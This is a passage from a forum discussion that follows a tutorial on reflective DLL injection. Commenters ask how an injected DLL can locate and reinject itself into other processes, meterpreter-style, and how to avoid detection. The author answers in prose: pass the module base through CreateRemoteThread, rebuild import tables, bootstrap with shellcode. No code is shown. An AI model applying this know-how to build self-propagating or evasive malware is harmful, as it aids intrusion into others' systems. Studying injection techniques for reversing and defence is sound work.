As I’ve stated previously, the code is bare minimum working and there may be a lot more things I’d need to add to support DLLs with slightly different structures. I’ve also opted to create a GUI for it too but further development of the code might not be considered for the time being. I will upload it to my Gitlab here!

Thanks for reading and I hope you’ve learned something!

dtm

How would you go about letting the DLL inject itself, without the need for a separate injector? Sorta like meterpreter. Can the DLL read its process’s memory and copy itself from there?

A DLL is a library, not a standalone executable so you cannot execute it like normal. If I’m correct, there is a potential way to do this which is basically injecting the executable’s memory itself. Of course, this would mean that the DLL code would be part of the main injector at the source level or in some form of shellcode. Once injected, you will have to locate the entry point to start remote thread execution which can just be AddressOfEntryPoint but that would require you to define some code which is able to recognise if it is running under another process’s context or not so that it knows which execution path to follow. Or you could define an exported function which removes the need to check the state.

If you like the challenge, I’ll leave this up to you. Otherwise, I will allocate some time at a later date to create a PoC. But I’m sure you can do it! :wink:

I worded that badly. What I meant is, after the DLL is already injected into some process and running. How can the DLL find itself in the injectee’s memory, read itself and perform reflective injection on another process? Mostly curious about the finding part.

There is a parameter argument in CreateRemoteThread that you can use to pass the injected DLL’s module base to the DLL. Using that, it can find its own memory region to reinject itself.

EDIT: I’ve modified my TestDLL file to take in the image base as a parameter and here is what it looks like in action:

Hello, I’m a newbie at reversing and hacking, and I have some questions.
Why do you rebuild the import table in the injector’s address space?
I think there are two problems.

First, some DLLs are not loaded in the target process.
Second, some DLLs (maybe not system DLLs, but something like DirectX or other public DLLs) are not loaded at the same image base in the target’s address space.

Both can be solved by your ‘InitialiseFunctions’ function, which means you have to rebuild the IAT
after writing the DLL into the target process even though you have already rebuilt it.
So why do you rebuild it in the injector’s address space?

By the way, I think this is manual mapping, not reflective DLL injection.
Reflective DLL injection means the DLL loads itself from within the target’s address space.
But in this article, the injector loads the DLL (building the image form, relocations, IAT fix-ups) in its own memory and simply writes it into the target process.

Another question: if additional DLLs are loaded into the target process using LoadLibrary, isn’t that too easy to detect? I mean, a normal file wouldn’t load those DLLs.
So even if I inject my DLL using reflective injection, eventually I have to load third-party DLLs with LoadLibrary.

Is there any way to improve this?

Hello there! We’re all noobs at hacking here all looking to learn so I’ll try to answer your questions to the best of my ability.

The reason I chose to rebuild the import table there is because it is much simpler compared to constantly having to use ReadProcessMemory to query the import table and then use WriteProcessMemory to fix the addresses.

Yes, I understand that some DLLs may not be loaded into the target process; however, since this is a basic implementation designed purely as an example, handling for that was not included here. If you wish to have these features, you will need to create them yourself.

The rest of the issues you discuss in your post can be remedied using another approach which is to first inject a bootstrap-style shellcode into the target process along with the payload. This will then perform the initialisation similar to what has been demonstrated here. If you’re keen on developing this, we would love to see it posted here. :wink:

Thx for the reply.:slightly_smiling_face: